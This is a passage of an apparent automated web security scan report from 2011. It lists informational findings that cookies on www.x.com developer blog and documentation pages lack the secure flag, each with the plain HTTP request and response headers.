2.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.92. https://www.x.com/docs/DOC-1031

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.93. https://www.x.com/docs/DOC-1041

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.94. https://www.x.com/docs/DOC-1051

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.95. https://www.x.com/docs/DOC-1106

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.96. https://www.x.com/docs/DOC-1108

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.97. https://www.x.com/docs/DOC-1116

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.98. https://www.x.com/docs/DOC-1176

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.99. https://www.x.com/docs/DOC-1204

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.100. https://www.x.com/docs/DOC-1216

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.101. https://www.x.com/docs/DOC-1332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.102. https://www.x.com/docs/DOC-1372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.103. https://www.x.com/docs/DOC-1374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.104. https://www.x.com/docs/DOC-1401

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.105. https://www.x.com/docs/DOC-1431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
